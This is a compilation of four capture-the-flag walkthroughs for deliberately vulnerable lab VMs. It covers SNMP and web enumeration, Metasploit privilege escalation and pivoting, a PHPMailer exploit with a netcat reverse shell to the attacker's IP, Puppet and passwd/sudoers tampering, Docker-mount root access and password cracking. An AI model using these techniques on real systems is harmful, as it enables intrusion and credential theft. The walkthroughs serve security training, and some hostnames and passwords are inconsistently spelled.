Hack the Analougepond VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge, Analougepond, which builds on our previous article "SSH pivoting": if you are comfortable with SSH pivoting, you will find this VM straightforward.

The credit for making this VM goes to "Knightmare". It is another boot-to-root machine in which the author has hidden flags for the attacker as the challenge.

Let's Breach!!!

The target's IP on our network is 192.168.0.108; let's use nmap to find the open ports (-sU is included because SNMP listens on UDP).

nmap -sT -sU 192.168.0.108

From the scan output you can see port 22 (SSH), 68 (DHCP client) and 161 (SNMP) open on the target; SNMP runs over UDP, which is why the -sU scan was needed.

Now let's enumerate SNMP using Metasploit.

This module enumerates any device with SNMP support and reports hardware, software and network information. The default community string it tries is "public".

 use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(snmp_enum) > set rhosts 192.168.0.108

msf auxiliary(snmp_enum) > set threads 5

msf auxiliary(snmp_enum) > exploit

From the module output you can read system information such as the host IP, hostname and description. Two fields stand out: the contact, which contains the name Eric Burdon, and the location, which contains the text "there is a house in New Orleans they call it..."

"eric" is a likely username. Searching Google for the location text shows that it is the opening line of the song "The House of the Rising Sun" (the version everyone knows was recorded by Eric Burdon's band, The Animals). The author probably intends the song to hint at the password, and the obvious candidate from the lyric is "the Rising Sun", i.e. "therisingsun" for SSH.

Now let's test the SSH login using Metasploit.

This module tests SSH logins on a range of machines and reports successful ones. If a database is connected, it records successful logins and hosts so you can track your access.

use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.0.108

msf auxiliary(ssh_login) > set username eric

msf auxiliary(ssh_login) > set password therisingsun

msf auxiliary(ssh_login) > exploit

As a result we logged in successfully and obtained command shell session 1 on the target. Looking around further, the installed version of Ubuntu is 14.04.1.

A quick search shows that Ubuntu 14.04.1 with its default kernel is vulnerable to the overlayfs local privilege escalation (CVE-2015-1328), and Metasploit has a module for it. Check the running kernel with uname -r against the ranges below before trying it; the module only works if the kernel falls inside a vulnerable range.

This module attempts to exploit two different CVEs related to overlayfs:

CVE-2015-1328 (Ubuntu specific): 3.13.0-24 (14.04 default) < 3.13.0-55; 3.16.0-25 (14.10 default) < 3.16.0-41; 3.19.0-18 (15.04 default) < 3.19.0-21

CVE-2015-8660: Ubuntu 3.19.0-18 < 3.19.0-43; 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10); Fedora < 4.2.8 (vulnerable, untested); Red Hat < 3.10.0-327 (RHEL 6, vulnerable, untested)

use exploit/linux/local/overlayfs_priv_esc

msf exploit(overlayfs_priv_esc) > set  lhost 192.168.1.105

msf exploit(overlayfs_priv_esc) > set session 1

msf exploit(overlayfs_priv_esc) > exploit -j

This time too we got a command shell, session 2, on the target, now running as root.

Convert command shell session 2 into a Meterpreter session with:

sessions -u 2

This opens a new session, session 3, with a Meterpreter shell.

meterpreter> ls

meterpreter> cat flag.txt

We have Captured 1st flag successfully!!

Checking the network interface configuration on the target, I found a second network, 192.168.122.1 on its third interface, as shown in the image. (192.168.122.0/24 is the default network libvirt/KVM gives to guest VMs, which suggests more machines live behind this host.)

This module manages session routing via an existing Meterpreter session. It enables other modules to "pivot" through a compromised host when connecting to the named NETWORK and SUBMASK. AUTOADD searches the session for valid subnets in the routing table and interface list and adds routes to them. DEFAULT adds a default route so that all TCP/IP traffic not matched by the MSF routing table is sent through the session.

 msf > use post/multi/manage/autoroute 

msf post(autoroute) > set subnet 192.168.122.1

msf post(autoroute) > set session 3

msf post(autoroute) > exploit

meterpreter > arp

Here you can see all IP and MAC addresses in the ARP cache; 192.168.122.2 and 192.168.122.3 are the next targets.

This module enumerates open TCP services by performing a full TCP connect on each port. It does not need administrative privileges on the source machine, which is useful when pivoting.

 use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set rhosts 192.168.122.2

msf auxiliary(tcp) > set ports 1-500

msf auxiliary(tcp) > set threads 10

msf auxiliary(tcp) > exploit

The result shows port 22 (SSH) open.

Drop into the Meterpreter session and forward port 22 of 192.168.122.2 to local port 8000:

sessions 3

portfwd add -l 8000 -p 22 -r 192.168.122.2

Now connect to the SSH server through the forwarded port on localhost:

ssh localhost -p 8000

The pre-authentication banner shown in the image is again a hint: the username is "sandieshaw". A Google search for her most famous song gives the password hint.

From that search we guessed the password to be her famous song, "puppetonastring".

With these credentials we connect as sandieshaw over SSH.

After connecting, we found that our task is to root this system.

Looking through the files on this system, we found that Puppet is running on it.

Among those files, a Puppet manifest ensures that a file named spin is present in /tmp, copied from the module's files directory; since the Puppet agent runs as root, the copy is installed with root privileges. Read the manifest to confirm the owner and mode it sets on /tmp/spin before replacing anything.

In the module's files folder we found two files: a C source file and the compiled executable. The C file is the code for a spinning pipe, a terminal "spinner". Since Puppet places whatever it finds there into /tmp as root, we replace the compiled spin binary with our own program that gives root access.

Because Puppet installs the file as root, the copy it drops in /tmp runs with root rights, and executing it gives us a root shell on the server.

We go back to the Meterpreter shell and upload our source to eric's home directory.

meterpreter > upload /root/Desktop/spin.c

After uploading it we compile it on the box and send the binary to sandieshaw over SSH:

scp spin sandieshaw@192.168.122.2:/home/sandieshaw

Now we replace the spin file in /etc/puppet/modules/wiggle/files/ with ours.

With spin replaced, we wait for the next Puppet run to copy our file to /tmp/.

After waiting a while, we execute the spin file in /tmp/.

Now we have a root shell. In /root/protovision we found a flag in hexadecimal.

Converting it from hex gave a base64 string written backwards.

Reversing the string and base64-decoding it gave a link to a YouTube video.

The other files, jim and melvin, held nothing significant, so we moved to the folder .I_have_you_now. There we found a folder .a; to see how deep the nesting goes we listed every directory beneath it with:

find . -type d

It goes all the way down to .z, so we move to that location and list its content.

We found two files: one GPG-encrypted and one plain text. We decrypt the first with:

gpg nleeson_key.gpg

This asks for a passphrase; the passphrase is "secret", which is hinted at in the video.

The decrypted file is an SSH private key, so we restrict its permissions (ssh refuses to use a key readable by others):

chmod 600 nleeson_key

The other file contains a single word: joshua.

During our network scan we found another IP, 192.168.122.3, with SSH open, but we could not log in to it.

Now we try to connect to it using the private key we found.

After guessing a few usernames we found that nleeson is the user on that system.

Using the key prompts for its passphrase, which is joshua.

We connected to 192.168.122.3. After looking around we found nothing useful, so we went back to the root shell on 192.168.122.2. Looking through the files there, we found that 192.168.122.2 is the Puppet server and 192.168.122.3 is a Puppet client, and that a file called barringsbank-passwd holds all the usernames and password hashes for 192.168.122.3.

So we add a new user, ignite, to this file in vim.

The file stores passwords as salted MD5 hashes (md5-crypt, the $1$ format), so we generate such a hash for the password ignite with xyz as the salt.

Then we add our user to the sudoers file managed by the server to gain root.

We give the new user the same privileges as root.

Then we connect to 192.168.122.3 over SSH with the username and password we just created.

We have to wait a while for the Puppet agent on the client to pull the updated passwd and sudoers files, so that our user gains root.

Then we get a root shell with sudo su.
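As an added example (not part of the original write-up), here is the md5-crypt algorithm in plain Python, so you can generate the $1$ hash for the new passwd entry without depending on Python's crypt module (removed in 3.13) or remembering the openssl passwd -1 flags, and verify a candidate against a stored hash. The field layout in passwd_entry is an assumption about what barringsbank-passwd looks like; the write-up does not show the file.

```python
"""md5-crypt ($1$) in plain Python. Added example, not from the write-up."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """crypt(3)'s base-64 variant: least-significant 6 bits first, no padding."""
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(count))


def md5_crypt(password: str, salt: str) -> str:
    """Return '$1$<salt>$<22 chars>' exactly as glibc crypt(3) / openssl passwd -1 would."""
    pw = password.encode("utf-8")
    salt_b = salt.encode("ascii")[:8]          # the format keeps at most 8 salt characters
    magic = b"$1$"

    ctx = hashlib.md5(pw + magic + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    remaining = len(pw)                         # feed len(pw) bytes of alt, 16 at a time
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bits = len(pw)                              # the reference implementation's odd bit walk
    while bits:
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()

    for i in range(1000):                       # fixed 1000 stretching rounds
        round_ctx = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            round_ctx.update(salt_b)
        if i % 7:
            round_ctx.update(pw)
        round_ctx.update(final if i & 1 else pw)
        final = round_ctx.digest()

    f = final                                   # bytes are interleaved before encoding
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return "$1$" + salt_b.decode("ascii") + "$" + encoded


def verify(password: str, stored: str) -> bool:
    """Check a candidate against a stored $1$ hash by re-deriving it with the stored salt."""
    if not stored.startswith("$1$"):
        return False
    salt = stored.split("$")[2]
    return md5_crypt(password, salt) == stored


def passwd_entry(user: str, password: str, salt: str, uid: int = 1001, gid: int = 1001,
                 shell: str = "/bin/bash") -> str:
    """ASSUMED layout: a classic 7-field passwd line with the hash in the password field.
    The write-up does not show barringsbank-passwd; match the real file's layout."""
    return f"{user}:{md5_crypt(password, salt)}:{uid}:{gid}:{user}:/home/{user}:{shell}"


if __name__ == "__main__":
    print(passwd_entry("ignite", "ignite", "xyz"))
```

The salt is truncated to 8 characters and the output is always 22 characters, so a $1$ line is 26 characters plus the salt; anything else in the file is a sign the server expects a different hash type, and a wrong type silently locks the account out rather than erroring.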

In /root we find an image file, me.jpeg.

We copy the image to eric's home directory with scp.

scp me.jpeg eric@192.168.1.119:/home/eric/

Then we download the file from eric's machine to our local system through Metasploit: in the Meterpreter session, change into eric's home directory and download me.jpeg.

meterpreter > cd eric/

meterpreter > download me.jpeg /root/Desktop/

exiftool showed nothing interesting in the file's metadata, so we checked for steganography with steghide.

First check whether anything is embedded in the image:

steghide --info me.jpeg

The passphrase is reticulatingsplines; I found it after various attempts.

steghide reports a hidden text file.

Extract it with:

steghide extract -sf me.jpeg

It asks for the passphrase again: reticulatingsplines.

The extracted file turned out to be hex-encoded.

Converting it from hex gave text that was again base64, but not directly decodable.

The text contains a recurring "gACI" token that breaks base64 decoding.

After removing every occurrence, the remaining text was reversed; reversing and base64-decoding it gave the final flag.
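Both flag blobs on this box (the YouTube link in /root/protovision and the file extracted from me.jpeg) follow the same pattern: hex-encoded, reversed base64, in the second case with a filler token sprinkled in. As an added example (not from the write-up), the Python below decodes that layering in one step and exposes each intermediate layer so you can see where a decode goes wrong. The sample blob is constructed here by running the encoding forward; it is not the VM's real flag.

```python
"""Peel hex -> (filler removal) -> reverse -> base64. Added example, not from the write-up."""
import base64
import binascii

FILLER = "gACI"  # the recurring token the write-up reports inside the base64 text


def peel(hex_text: str, filler: str = FILLER) -> dict:
    """Return every intermediate layer, not just the result, for eyeballing."""
    hex_clean = "".join(hex_text.split())                  # tolerate newlines/spaces in dumps
    raw = binascii.unhexlify(hex_clean).decode("ascii")
    # Filler removal is a plain substring delete: it would also eat a genuine
    # "gACI" inside the base64, so only pass a filler when decoding fails without it.
    stripped = raw.replace(filler, "") if filler else raw
    reversed_b64 = stripped[::-1]                           # padding '=' moves back to the end
    plain = base64.b64decode(reversed_b64, validate=True).decode("utf-8")
    return {
        "hex_decoded": raw,
        "filler_removed": stripped,
        "reversed": reversed_b64,
        "plaintext": plain,
    }


def decode_layered(hex_text: str, filler: str = FILLER) -> str:
    return peel(hex_text, filler)["plaintext"]


def encode_layered(plaintext: str, filler: str = FILLER, every: int = 6) -> str:
    """Forward direction, used only to build sample data for the demo."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")[::-1]
    if filler:
        chunks = [b64[i:i + every] for i in range(0, len(b64), every)]
        b64 = filler.join(chunks)
    return binascii.hexlify(b64.encode("ascii")).decode("ascii")


# Constructed sample (NOT the real flag): encoded here with the filler inserted every 6 chars.
SAMPLE_FLAG = "FLAG{constructed sample, not the real flag}"
SAMPLE_HEX = encode_layered(SAMPLE_FLAG)

if __name__ == "__main__":
    for layer, value in peel(SAMPLE_HEX).items():
        print(f"{layer:15}: {value}")
```

validate=True makes b64decode refuse any character outside the base64 alphabet instead of silently dropping it, which is what makes the filler show up as an error rather than as garbled output; for the first flag, which had no filler, call decode_layered with filler="".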

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

Hack the Moria: 1.1 (CTF Challenge)

Today I found a vulnerable lab based on the world of The Lord of the Rings, so get into Gandalf mode to solve this fun lab, Moria 1.1. We are going to download the VM from here.

The credit for developing this VM goes to Abatchy. It is a Boot2Root lab.

Note: According to the author you don't need LOTR knowledge to hack this VM, but trust me, you need it.

Let’s Breach!!!

As always, let us start by finding the IP of the VM (here it is 192.168.1.125, but you will have to find your own).

netdiscover

Use nmap command for port enumeration

nmap -sV 192.168.1.125

As you can see, port 21 (FTP), port 22 (SSH) and port 80 (HTTP) are open, so let's explore port 80 in the browser.

The page shows an image labelled Gates of Moria, and I researched the text written below it. After reading some wiki pages I found its translation, "Say Friend and Enter", where Mellon means Friend.

So Friend or Mellon may be a password; keep that in mind. Next I scanned the target for directories with dirb. Open a terminal in Kali Linux and type:

dirb http://192.168.1.125/

From the scan result I chose the highlighted directory for further enumeration.

http://192.168.1.125/w/

Opening this directory in the browser revealed another directory inside it, h/.

Opening that gave another directory, and so on, until the path completes as /w/h/i/s/p/e/r. There we find the last directory, the_abyss/.

Opening the_abyss gave some text, as shown in the image: Fundin: "That human will never save us!"

The source code held nothing, but refreshing the page changed the text; another refresh changed it to "Knock Knock".

It seemed odd at first, but after refreshing a few more times it was clear the text changes randomly on every refresh.

A plain dirb scan of this directory gave no result, so I ran dirb with extensions, as shown.

dirb http://192.168.1.125/w/h/i/s/p/e/r/the_abyss/ -X .txt,.img,.html

The -X option makes dirb append each listed extension (.txt, .img and so on) to every word in its list.

Aha! It found a file named random.txt.

Opening it in the browser showed all the lines that appear on refresh collected in a single page.

The text contains many names, among them Balin, Oin, Ori, Fundin, Nain, Eru and Balrog; I noted them, since they might be usernames or passwords.

Now I tried to connect to the FTP port.

ftp 192.168.1.125

It greeted me with "Welcome Balrog".

That had to be the username, since Balrog was in random.txt too. For the password I tried several of the names found earlier and then remembered the text from the image, "Say friend and enter". Friend failed; Mellow logged in successfully.

Therefore, for the FTP login use the following credentials:

Username: Balrog

Password: Mellow

NOTE: If you get an error, restart the VM and try the above username and password a few more times.

After login, pwd showed the path to be /prision. I looked around for a flag but found no hint. Then I found the var folder and moved into it.

From there I reached /var/www/html and found the folder QlVraKW4fbIkXau9zkAPNGzviT3UKntl.

Opening it in the browser showed a table with two columns, Prisoner's name and Passkey, as in the image.

As always, I checked the source code for a hint. In the page source I found a "salt", which is what we need to crack the MD5 passkeys.

After trying different hash formats for the passkeys, I created a file with name, passkey and salt in this format:

Prisoner's Name:Passkey$Salt

Name it whatever you want (here I saved it on my Kali desktop as lol).

Now run John the Ripper against this file with the dynamic_6 format, which is md5(md5($p).$s): the MD5 of the password's MD5 hex digest with the salt appended.

john --format=dynamic_6 /root/Desktop/lol

These look like login credentials.

After trying the cracked credentials for SSH, I got in with:

SSH Login

Username: Ori

Password: spanky

Now log in over SSH with these credentials:

ssh Ori@192.168.1.125

This gives a bash shell. Searching for a flag with ls -al, I found a poem.txt containing a poem, but no flag in it.

Then I looked into the .ssh/ directory and found a known_hosts file and an id_rsa file containing a private key; I opened them one by one.

cat id_rsa

Copy the entire text of id_rsa into a file and save it as id_rsa (and chmod 600 it, or ssh will refuse to use it).

Now read known_hosts with cat: the host listed is 127.0.0.1. Use this key for an SSH login as root on that host, from Ori's shell on the VM, where 127.0.0.1 is the target.

ssh -i id_rsa root@127.0.0.1

I got ROOT.

But let's finish properly. ls -la showed a flag.txt, and inside it I got the final message: "All that is gold does not glitter".

It was an adventurous and learning experience and I would like to thank Abatchy for creating such a fun VM Lab.

Author: Pavandeep Singh is an Ethical Hacker, Cyber Security Expert and Penetration Tester, India. Contact here

Hack the DonkeyDocker (CTF Challenge)

Today we are going to solve a fun vulnerable lab, DonkeyDocker; download the VM from here.

The credit for developing this VM goes to Dennis Herrmann, who has hidden 3 flags inside the lab as a challenge.

Let's Breach!!!

Let us start by finding the IP of the VM (here it is 192.168.1.120, but you will have to find your own).

netdiscover

Use nmap command for port enumeration

nmap -sV 192.168.1.120

As you can see, port 22 (SSH) and port 80 (HTTP) are open, so let's explore port 80 in the browser.

The site has three tabs, Home, About and Contact, but no clue for the next step, so I scanned the target for directories with dirb.

Now open the terminal in kali Linux and type following command:

dirb http://192.168.1.120

From the scan result I chose the highlighted directory, http://192.168.1.120/mailer/examples/, for further enumeration.

Here we learn that PHPMailer is running on the target. Let's find its version.

After reading a bit about PHPMailer, we found that the version is stored in a file at the root of the library:

http://192.168.1.120/mailer/VERSION

The PHPMailer version is 5.2.16.

PHPMailer before 5.2.18 is vulnerable to remote code execution (CVE-2016-10033): the sender address is handed to the sendmail binary with insufficient escaping, so extra sendmail arguments can be injected through the From field, which is enough to write a PHP file into the web root. A public Python exploit drops such a backdoor and calls back with a reverse shell. You can download this exploit from here.

After downloading the Python file, make the following changes:

  1. Open the file and add "# coding: utf-8" at the beginning.
  2. Set target = 'http://192.168.1.120/contact' (the victim URL); this is the form through which backdoor.php gets uploaded to the victim's machine automatically.
  3. Put the attacker IP, 192.168.1.101 (Kali Linux IP), inside the payload code.
  4. Save the file.

Now start netcat on the port the payload connects back to, 4444, to receive the reverse connection from the target.

nc -lvp 4444

Before you run the script, install the exploit's dependency in a new terminal:

pip2 install requests_toolbelt

Now run the script to exploit the target, as shown in the image.

python 40974.py

Go back to the netcat window: it is connected to the victim, but the shell is not a proper TTY, so upgrade it with:

python -c 'import pty; pty.spawn("/bin/bash")'

Once you have the shell, use the following commands to look for the hidden flag.

ls

cat main.sh

Here we find that there is a user smith whose home directory holds flag.txt; let's go there.

cd home

ls

Opening the smith directory gives Permission denied.

Since sudo is not available in this shell, we switch user with su instead.

su smith

For the password we tried "smith" and got smith's shell.

Now inside smith's shell, use the following commands to get the flag:

ls

cd /home/smith

ls

flag.txt

cat flag.txt

Great!! Successfully captured the 1st flag.

Notice in the image the next clue, "I like 1984 written by George ORWELL": this could be a username whose account holds the 2nd flag.

Type following command to view all directory list

ls -al

In the .ssh directory we find authorized_keys, id_ed25519 and id_ed25519.pub; let's open them one by one.

cat authorized_keys

cat id_ed25519

cat id_ed25519.pub

id_ed25519 is an OpenSSH private key, and its public half is authorized for orwell@donkeydocker. Copy the private key into a text file on the attacking machine.

We saved the private key in a file named id_rsa (the file name does not matter; the key is still Ed25519), as shown in the image, and restricted it with chmod 600.

Now log in over SSH with it:

ssh -i id_rsa orwell@192.168.1.120

You are greeted by the Donkey Docker shell. Now list the directory for the 2nd flag:

ls

flag.txt

cat flag.txt

Nice!! Successfully got the 2nd flag.

For the last flag we tried a lot of different tricks, but nothing got through; you can read an article from here which helped in finding the 3rd flag.

Type the following command:

docker run -v /root:/hack -t debian:jessie /bin/sh -c 'ls -al /hack'

This does not create a user; it starts a debian:jessie container with the host's /root directory bind-mounted at /hack and lists it. Processes inside a container run as root, and anyone allowed to talk to the Docker daemon (orwell can run docker here) may mount any host path into a container, so access to the daemon is effectively root on the host. The listing shows flag.txt.

To read the file, use the previous command with a slight modification:

docker run -v /root:/hack -t debian:jessie /bin/sh -c 'cat /hack/flag.txt'

Awesome, we got the 3rd flag too.

Author: Pavandeep Singh is an Ethical Hacker, Cyber Security Expert and Penetration Tester, India. Contact here

Hack the d0not5top VM (CTF Challenge)

This time we are going to solve a fun vulnerable lab, d0not5top 1.2. Download the VM from here.

The credit for developing this VM goes to 3mrgnc3, who has hidden 7 flags inside the lab as a challenge.

Let's Breach!!!

As always, let us start by finding the IP of the VM (here it is 192.168.1.113, but you will have to find your own).

netdiscover

Next we run nmap

nmap -sV 192.168.1.113

Now visit the IP in the browser.

Since I found nothing interesting when browsing the IP, I scanned the web content with dirb in Kali Linux.

dirb http://192.168.1.113

In the image I have highlighted a URL that points to the site's control panel; open 192.168.1.113/control in the browser. It is a DNS control panel, but there is no clue for the 1st flag on the page itself.

Open the page source instead and notice FL46_1, which is the 1st flag.

Wonderful!! Successfully found the 1st flag.

The dirb result lists many web directories; next I chose 192.168.1.113/control/js. In it I found a file, README.MadBro, which opens as shown below.

Here we find binary code that has to be converted to text. On conversion you get FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

Great!! Successfully get 2nd Flag.

Now, for the third flag, we connect with netcat in very verbose mode to port 25, which hosts the SMTP service (found by an aggressive nmap scan of the IP).

nc -vv 192.168.1.113 25

The banner contains hexadecimal that decodes to text.

Great!! Successfully got the 3rd flag as well.

On the page where we found the second flag there is an instruction written in leet: M4K3 5UR3 2 S3TUP YOUR /3TC/HO5TS N3XT TIM3 L0053R… 1T'5 D0Not5topMe.ctf!!! So we add an entry for it to /etc/hosts, as shown in the image.

Now open d0not5topme.ctf in the browser and click Register at the end of the web page.

There is no clue on this page, so open the page source.

In the page source we found the link shown highlighted.

The page it leads to is full of +, -, <, >, [ and ] characters. A search shows this is Brainfuck, an esoteric programming language, not an encoding: the page is a program, and running it in an interpreter prints its output.

Running it gives FL46_4.

Successfully found 4th flag

Now go back to d0not5topme.ctf, click Register and then "I agree to these terms" to reach the registration page. Click Board Administration, which opens a prompt asking which mail client should handle the mailto link; I chose Gmail.

Here I found another host: Megusta@G4M35.ctf

Now add G4M35.ctf to /etc/hosts as before and save.

Opening this domain in the browser gives a game to play. You can get the next clue by playing, but I took a more technical approach: open the page with Inspect Element and select the Debugger tab. There I found game.js, and inside the Game_Over script the next clue, "/H3X6L4m3".

Opening the complete link, g4m35.ctf/H3X6L4m3, gives another game.

Again we could play to discover the next clue, but we took the technical approach and ran dirb on this path to look at its directories.

dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt

From the result I highlighted http://g4m35.ctf/H3x6L64m3/textures/ for further enumeration.

I opened the textures directory in the browser, then the skybox directory and then the dawnclouds directory, and found the file nz.jpg as shown.

Opening the image shows octal code.

Decoding it gives FL46_5.

I had Captured 5th flag also!!

Now go back to the second game, http://g4m35.ctf/H3x6L64m3, and open it with Inspect Element. In the Debugger tab I found Gameplay.js, which contains another domain, "t3rmln4l.ctf", as shown below.

Add t3rmln4l.ctf to /etc/hosts as before and save.

Opening this domain in the browser gives a terminal that asks for a password. After trying a bunch of commands I found that grep* works in this terminal, and for authentication I entered the domain name itself as the password, i.e. t3rm1a4l.ctf, and found another domain, "M36u574.ctf".

Add M36u574.ctf to /etc/hosts as before and save.

Opening this domain in the browser gives a slideshow of Megusta images. Out of the different images I downloaded kingmegusta.jpg.

Running exiftool on this image shows some code in the Comment field, as shown below.

Convert the code to text: the result, shown in the image, is base64-encoded. Copy it.

Then I created a text file on /root/Desktop/ (name it anything you want) and pasted the decoded text into it.

Now run John the Ripper on this file as shown:

john --wordlist=/usr/share/wordlists/rockyou.txt donotstop

This gives a user, MeGustaKing, and the password ********** (10 asterisks).

With this username and password we log in over SSH. Here we get a code and another username/password pair, burtieo:Lets you update your FunNotes and more! But first let's decode the highlighted code.

It is base64; decoding it gives what looks like an MD5 hash.

Great! It is the 6th Flag.

As mentioned, in the previous SSH session we got the username burtieo, and its password is the text written beside it: Lets you update your FunNotes and more!

Now log in over SSH with this combination:

Username: burtieo and Password: Lets you update your FunNotes and more!

This opens an rbash shell, a restricted bash that disables features such as cd, output redirection and running commands by path.

So first run the following command to see what this user may run through the sudo lookalike:

suedoh -l

Then run:

suedoh /usr/bin/wmstrt

A subsequent nmap scan shows port 10000 open.

This port only stays open for about 20 seconds, so we keep re-running suedoh /usr/bin/wmstrt in a for loop, as shown, to keep it up while we work.

Now launch Metasploit and use the Webmin file_disclosure module (an arbitrary file read in old Webmin versions):

msf > use auxiliary/admin/webmin/file_disclosure

msf auxiliary(file_disclosure) > set rhost 192.168.1.113

msf auxiliary(file_disclosure) > set ssl true

msf auxiliary(file_disclosure) > set rpath /root/.ssh/id_rsa

msf auxiliary(file_disclosure) > exploit

I found the RSA private key, as shown.

Copy and paste the private key into a file named id_rsa, then run John the Ripper on it (the key is passphrase-protected):

ssh2john id_rsa > ignite

john --wordlist=/usr/share/wordlists/rockyou.txt ignite

This recovers the key's passphrase: "gustateamo".

I then restricted the permissions of id_rsa with chmod 700 and logged in over SSH as root with the key, entering gustateamo as the passphrase, as shown below.

Now type the following command:

ls

As the image shows, there are two files; let's open one of them.

cat L45T_fl46.pl

It says to run L45T_fl46.pl.

Now use netcat on the attacker machine to listen on port 1234 for the connection from the target.

nc -lvvp 1234

In the D0Not5top terminal, run L45T_fl46.pl with the Kali Linux IP, 192.168.0.7, and the port:

./L45T_fl46.pl 192.168.0.7 1234

On the attacker system netcat receives the connection from the target; the highlighted text is FL46_7.

Congratulations!! It is the 7th flag.

Solving this lab was a fun and learning experience.

Author: Rajat Chikara is an Ethical Hacker, Cyber Security Expert and Penetration Tester, India.
